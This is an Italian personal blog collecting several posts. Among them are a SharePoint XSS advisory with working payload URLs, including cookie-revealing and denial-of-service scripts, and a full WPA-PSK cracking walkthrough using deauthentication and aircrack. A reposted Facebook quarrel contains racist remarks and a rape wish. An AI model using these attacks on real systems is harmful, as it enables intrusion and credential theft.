Tanti auguri a me!

Tre anni di blog.

Vulnerabilità cross-site scripting per Share Point

Come descritto da Mammona Microsoft nel security advisory 983438, Share Point risulta vulnerabile ad un attacco cross-site scripting (XSS).
Il problema risiederebbe in una variabile, cid0, che non viene ripulita dai caratteri speciali permettendo così di iniettare codice arbitrario nelle pagine del sito. Così facendo si espongono gli utenti del sito a diversi pericoli:

• furti di dati tra cui i cookie di autenticazione al sito stesso: tramite javascript è possibile andare a leggere il document.cookie e passarlo, per esempio come parametro codificato tramite il comando window.open, ad una pagina creata ad-hoc per registrare i dati ricevuti.
• esecuzione di software non autorizzato: incapsulando un iframe nella pagina o sempre con il comando window.open è possibile indirizzare gli utenti verso siti malevoli che installeranno ed eseguiranno software non autorizzato sul pc dell'utente.
  
• attacchi denial of service: è possibile creare script che bloccano il browser dell'utente.
• altro: l'unico limite è la fantasia.
  

Per testare se il vostro server SharePoint è vulnerabile potete usare questa stringa:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xm%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

ovviamente sostituendo "mioserver" con l'indirizzo del vostro server. Nel caso il vostro server sia vulnerabile si aprirà un popup con scritto "XSS".
Analizzando l'url vediamo come il parametro cid0 venga forzato tramite un carattere nullo () a ricevere un pezzo di javascript codificato in ascii racchiuso dai tag <script> e </script> a loro volta codificati.
Un esempio di come iniettare una pagina esterna al sito, in questo caso Google, tramite un iframe potrebbe essere questo:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Ciframe%20src=%22http://www.google.it%22%3E%3C/iframe%3E%&tid=X

Se invece vogliamo proprio aprire una nuova finestra possiamo usare il comando window.open in questo modo:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ewindow.open('http://www.google.it')%3C/script%3E&tid=X

per mostrare i cookie di sessione:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ealert(document.cookie)%3C/script%3E&tid=X

ed infine per creare un bel denial of service che costringerà a killare il processo del browser:

http://mioserver/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%3Cscript%3Ewhile(1)%20alert('Owned')%3C/script%3E&tid=X

Qualcuno ha addirittura pensato a vere e proprie backdoor in javascript da passare come sorgente di script tramite XSS per comandare da remoto i pc caduti vittima di questi attacchi. Non mi sono sincerato se la cosa funzioni sul serio o meno, il mio scopo è rendere l'idea di quante cose si possano fare avendo la possibilità di passare codice arbitrario alle pagine web.
Attualmente per sistemare questa falla di sicurezza non esistono patch. I programmatori devono sincerarsi di validare tutte le possibili fonti di input da parte dell'utente sostituendo o rendendo innocui tramite comandi di escape i caratteri speciali.

De Informatica Securitate

Dopo quasi un anno dall'ultimo post e a seguito del rinnovo del dominio mi trovo a scrivere questo breve articoletto che avevo in mente da un po' di tempo.

Già duemila anni fa due personaggi avevano trattato l'argomento sicurezza nei loro scritti. Certo non si sarebbero mai immaginati che quegli stessi princìpi molto tempo dopo si sarebbero potuti applicare a reti di calcolatori, ma loro ci avevano pensato sul piano logico ed erano giunti a delle conclusioni. Platone nell'opera La Repubblica afferma:

Nempe ridiculum esset, custode indigere custodem.

che tradotto vuol dire

Ovviamente è ridicolo, che un custode debba essere custodito.

Circa quattrocento anni dopo Giovenale nelle sue Satire si pone una domanda dalle sfumature simili:

Pone seram, cohibe, sed quis custodiet ipsos custodes?

che vuol dire più o meno

Spranga la porta, chiudi, ma chi sorveglierà gli stessi custodi?

Ora facciamo un salto avanti di duemila anni. E' il 27 Novembre 2008 e troviamo un provvedimento del Garante della Privacy che riguarda gli amministratori di sistema, che hanno un ruolo di custodi dei server che amministrano, il quale prescrive che i log, cioè i registri dei server che tengono traccia degli accessi ai server e delle operazioni svolte da chi accede agli stessi, abbiano caratteristiche di completezza, inalterabilità e che vi sia possibilità di verifica dell'integrità stessa dei dati. Impone cioè all'azienda di diffidare degli amministratori controllando il loro operato senza che l'amministratore possa modificare i registri per inquinare le prove delle sue operazioni.

Chi ha un minimo di conoscenze sull'argomento sa che i sistemi informatici sono gerarchici e al vertice della piramide del potere c'è l'amministratore di sistema, che ha poteri assoluti sui server in cui opera. Almeno un amministratore deve esserci. Sempre.

Come facciamo allora a fare in modo di controllare l'amministratore? Le tecniche sono diverse. Possiamo creare l'hash dei log, una sorta di impronta digitale univoca che assicura che il log stesso non sia stato modificato dopo la scrittura. Ma a chi affidiamo l'archivio degli hash per eventuali future verifiche? Dobbiamo ricorrere necessariamente ad un altro amministratore, se non allo stesso che viene controllato, ritrovandoci così al punto di partenza. E chi ci dice che i log non siano stati modificati prima della scrittura sul disco, magari a più basso livello, o che non siano stati modificati gli hash stessi in modo da autenticare log alterati? In fondo abbiamo detto che l'amministratore ha potere assoluto sui suoi server.

La soluzione a questo problema non c'è mai stata e non c'è tuttora, per quanto vengano vendute soluzioni chiavi in mano a volte anche molto costose. Questo provvedimento del garante sebbene possa essere trovato utile da qualcuno sul piano teorico è assolutamente inapplicabile a livello pratico, e non serve ad altro che ad impegnare in maniera poco proficua il tempo degli amministratori e i fondi delle aziende che potrebbero essere impegnati più produttivamente per fare formazione, ricerca e sviluppo, o per implementare altre aree che sono le prime ad essere trascurate in un'epoca in cui il tempo ed i fondi scarseggiano.

Cracking di reti WIFI protette con WPA-PSK

La sicurezza delle WLAN basate su WPA-PSK in questo momento dipende molto dalla lunghezza della password. Con un portatile equipaggiato con Linux (Ubuntu 9.04 Jaunty Jackalope) e gli opportuni tools vi mostrerò come trovare la password di una rete protetta con WPA-PSK.
Per fare questo utilizzeremo due programmi: aircrack e kismet. Aircrack è un pacchetto di programmi che permettono di crackare chiavi WEP e WPA, kismet invece ci permette di sniffare il traffico WIFI nell'aria.
Cominciamo installando i programmi.

root@argo:~# apt-get install aircrack-ng kismet

Ora la vostra linuxbox è pronta per cominciare. Mettetevi comodi e facciamo un rapido controllo delle reti WIFI disponibili nei dintorni:

root@argo:~# iwlist wlan0 scanning

wlan0 Scan completed :
Cell 01 - Address: 00:19:5B:54:C0:68
ESSID:"default"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=99/100 Signal level:-24 dBm Noise level=-81 dBm
Encryption key:on
IE: Unknown: 000764656661756C74
IE: Unknown: 010882848B960C121824
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000000eadcd9b
Extra: Last beacon: 200ms ago

La rete "default" è una wlan che ho approntato ad hoc per questo esempio, con un mio router e un mio access point. Non sto crackando la rete a nessuno, anche se potrei farlo volendo. :-)
Impostiamo la scheda WIFI in modalità "monitor". Questa modalità ci permetterà di sniffare le onde radio nell'etere e di analizzarle. Con questo comando vengono anche controllati i processi che potrebbero interferire durante le operazioni.

root@argo:~# airmon-ng start wifi0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2722 NetworkManager
2745 wpa_supplicant


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

Sono stati trovati due processi, NetworkManager e wpa_supplicant, che potrebbero dar fastidio. Airmon ha una funzione per killare questi processi.

root@argo:~# airmon-ng check kill

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2722 NetworkManager
2745 wpa_supplicant
Killing all those processes...

Controlliamo quindi che tutto sia andato a buon fine, facciamo un check e riabilitiamo l'interfaccia.

root@argo:~# airmon-ng check
root@argo:~# airmon-ng start wifi0


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

root@argo:~# airmon-ng


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

Il comando airmon-ng senza parametri ci mostra le interfacce abilitate, e ci conferma che la wlan0 è correttamente impostata.
Mettiamoci quindi a sniffare l'etere in cerca di informazioni sulla nostra rete.

root@argo:~# airodump-ng wlan0

CH 2 ][ BAT: 1 hour 17 mins ][ Elapsed: 12 s ][ 2009-07-30 21:05

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:54:C0:68 -61 85 0 0 6 54 WPA TKIP PSK default

BSSID STATION PWR Rate Lost Packets Probes

Troviamo l'access point "default" attivo sul canale 6, viene mostrato il MAC address e un altro po' di informazioni. In una condizione normale potrebbe capitare di trovare più reti disponibili, e client connessi alle varie WLAN. Mettiamo quindi un filtro sul MAC address della nostra WLAN e aspettiamo che qualcuno si connetta. Tutti i pacchetti da qui in avanti verranno raccolti in file per essere successivamente analizzati.

root@argo:/home/tsbrego/aircrack# airodump-ng -c 6 -w psk --bssid 00:19:5B:54:C0:68 wlan0


CH 6 ][ BAT: 1 hour 15 mins ][ Elapsed: 4 s ][ 2009-07-30 21:16

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:54:C0:68 -25 100 47 40 5 6 54 WPA TKIP PSK default

BSSID STATION PWR Rate Lost Packets Probes

00:19:5B:54:C0:68 00:16:6F:4F:A5:D0 -63 54 -48 1536 75

Troviamo finalmente un client collegato alla rete (grazie Enea!). Apriamo quindi una nuova shell e, con aireplay, mandiamo dei pacchetti di deautenticazione al client, il quale si disconnetterà e tenterà di ricollegarsi alla rete. E' qui che verrà passata, crittografata, la password di accesso alla rete e sono questi i pacchetti che ci interessano per i nostri scopi.

root@argo:~# aireplay-ng -0 3 -a 00:19:5B:54:C0:68 -c 00:16:6F:4F:A5:D0 wlan0
21:18:22 Waiting for beacon frame (BSSID: 00:19:5B:54:C0:68) on channel 6
21:18:23 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 2 ACKs]
21:18:23 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 4 ACKs]
21:18:24 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 2 ACKs]

Tra i file con i dati raccolti quello che ci interessa è psk-01.cap. Prendiamo il nostro fidato file dizionario.txt e mettiamoci a crackare la password WPA con la forza bruta.

root@argo:/home/tsbrego/aircrack# aircrack-ng -w dizionario.txt -b 00:19:5B:54:C0:68 psk-01.cap



Aircrack-ng 1.0 rc3


[00:00:00] 4 keys tested (39.33 k/s)


KEY FOUND! [ p4ssw0rd ]


Master Key : 3A 89 42 2A 28 90 4C A7 40 27 E4 77 D4 8A 60 DF
87 76 3B B0 E5 10 90 0F 7A 62 6D A1 89 EC AA 4F

Transient Key : E2 F4 80 2F 01 E1 99 21 8D AA 71 F1 61 B1 43 42
36 F8 A5 8A CE 58 D8 94 5B 03 95 F4 12 E1 CC 01
FE 1C 76 AD F3 CC C7 4C CD 7F 7C 0B 95 7E AF 91
84 C3 C9 53 4E B3 47 32 D1 37 C3 C9 82 AE 41 BB

EAPOL HMAC : D4 D8 8F 62 93 84 FD 97 49 28 76 A7 98 B9 A0 1D

Et voilà. Password trovata: p4ssw0rd.
E' chiaro che l'unico punto debole di questo sistema, per ora, è la password e che prerequisito per accedere alla rete è avere un buon dizionario che contenga tra le altre anche la password giusta. Nel mio caso, visto che conoscevo la password, mi ero preparato un file dizionario.txt che ha trovato la password al quarto tentativo.
Tenendo presente che un dizionario che contenga tutte le password da 10 caratteri con numeri e lettere solo in minuscolo pesa almeno 500 gb, se vogliamo rendere la nostra rete sicura possiamo dare una password di almeno 15 caratteri alfanumerici case sensitive e in linea di massima dormiamo sonni tranquilli. Più la password è lunga, più la rete è sicura. E' anche il caso di cambiare periodicamente la password, così da vanificare il lavoro certosino di chi vuole la nostra rete.
Tra i router out of the box forniti dai provider spicca Alice con una password di 24 caratteri, quindi molto sicura, mentre i router fastweb di default ne hanno 10.
E' chiaro che la prima cosa da fare appena acceso il proprio router wifi nuovo fiammante è andare a cambiare la password predefinita con una nuova. Ci sono gruppi di appassionati che cercano di trovare l'algoritmo per trovare la password predefinita dal produttore partendo dal MAC address, che è una informazione liberamente accessibile. Per ora sembra che nessuno ci sia riuscito, ma è meglio non rischiare.

I diritti si restringono

Un parcheggio per disabili ridotto per favorire l'accesso ad un'auto blu.
Sembra impossibile eppure è questo che è accaduto nella casa dei cittadini di Verona.
Centro della questione è il parcheggio riservato all'auto di servizio del nostro noto sindaco Flavio Tosi e un adiacente parcheggio per disabili, il quale è stato ridotto di una quarantina di centimetri affinchè le portiere dell'audi del nostro buon Flavio non cozzino accidentalmente con eventuali altre autovetture parcheggiate e per evitare che possa sporcarsi i vestiti strisciando dentro e fuori dall'auto.
Nelle foto sono ben visibili i vecchi segni azzurri, ormai sbiaditi, e si apprezza bene la sproporzione nella larghezza dei posti. Nella seconda foto è possibile anche notare la differenza di larghezza tra il posto disabili di destra e quello modificato a sinistra.
Grazie a D4r|0 per le foto e a Fastidio per il titolo.

Uso ricorsivo di a2mp3

A volte si ha la necessità di ottimizzare con a2mp3 un'intera cartella, magari con diverse sottocartelle. Il programma nativamente non ha funzionalità ricorsive, torna quindi utile questo comando:

find /home/utente/cartella -name '*.mp3' -exec a2mp3 '{}' \;

Il comando non fa altro che trovare tutti i file con estensione .mp3 che si trovano nella cartella /home/utente/cartella e, tramite il parametro -exec, passarli ad a2mp3 che li processa mettendo il prodotto finito nella cartella /home/utente/mp3tmp. Semplice.
Da tenere presente:

• Il percorso della cartella in cui eseguire la ricerca dev'essere completo, altrimenti a2mp3 darà un errore tipo "touch: cannot touch...No such file or directory".
• Il simbolo "'{}'" indica la posizione in cui verranno messi i file risultanti da passare ad a2mp3.
• Il ";" deve essere preceduto dal carattere di escape "\" altrimenti verrebbe processato come interruzione del comando find e non passato ad exec come interruzione di a2mp3.

Io non sono razzista, sono loro che sono neri!

Riporto in toto un flame nato da una massmail su facebook. Purtroppo certi pensieri sono normale amministrazione di questi tempi.

Simone Tartari
15 febbraio alle ore 16.36
Basta stupri!! difendiamo le nostre madri, sorelle, figlie, ragazze, mogli!!
riprendiamoci la dignità ITALIANA!!! fate girare!!!

Matteo Iacono
15 febbraio alle ore 16.48
Giusto bravo!
Riprendiamoci anche la dignità italiana contro i preti pedofili!
Ah no, scusa, quelli no perchè sono bianchi..
Ma va a cagare va!

Simone Tartari
15 febbraio alle ore 20.42
pensi che io non sia contro i pedofili?? che siano bianchi, neri, gialli, o rossi, preti o politici persone normali o mafiosi sempre merde allo stesso modo!! preti ancora peggio visto che dovrebbero insegnare altre cose...
non sò non vorrei essere stato frainteso...
comunque non faccio distinzioni razziali ma è un dato di fatto che questi ne combinano di peggio! una volta non si sentiva mai parlare di stupri di gruppo e per giunta su ragazze di 15 anni!

Matteo Iacono
Oggi alle 0.28
Guarda, non è neanche colpa tua..sei solo uno dei tanti ignoranti che fanno di tutta l'erba un fascio e che assorbono quello che passa in tv senza provare a pensare con la propria testa.
Se non si parla degli stupri compiuti da italiani è solo perchè fanno meno notizia di sti tempi, non certo perchè non ce ne siano. Inoltre se certe dinamiche si sviluppano più facilmente (e bada bene che ho detto più facilmente, non esclusivamente) tra gli extracomunitari è solo perchè la maggior parte di loro vive in situazioni di povertà e degrado, in un territorio che non è il loro e si sentono soli e disprezzati da qualsiasi persona che li circondi.
E tu pensi alla dignità italiana? Un'italia con i preti che abusano di un'intera scuola di sordomuti, con i mafiosi che sciolgono i bambini nell'acido, con gli ultrà che si menano a sangue negli stadi, con un premier e tutta la classe politica che se ne fregano, che rubano e si fanno le leggi a proprio favore rendendoci ridicoli agli occhi del mondo.
La tua dignità italiana fa acqua..
Salutami il tuo amico Bossi che predica i valori della famiglia e si fa venire un coccolone andando a letto con Luisa Corna.

Simone Tartari
Oggi alle 0.44
sei solo un buonista, perbenista, scommetto che sei di sinistra... ora capisco perchè la gente non vota più la sinistra... se sono tutti come te... pensa se fossero state tua madre o tua sorella... ciao ciao

Matteo Iacono
Oggi alle 18.00
Risposta senza senso, tipica del classico bifolco di paese che da ragazzino truccava i motorini e che non ha mai aperto un libro o un giornale e ora guarda il tg di Fede e crede che quella sia la realtà.
Non mandare massmail perchè su internet non sono tutti ignoranti bigotti come te.
Spero che il prossimo ad essere violentato sia tu.
Addio.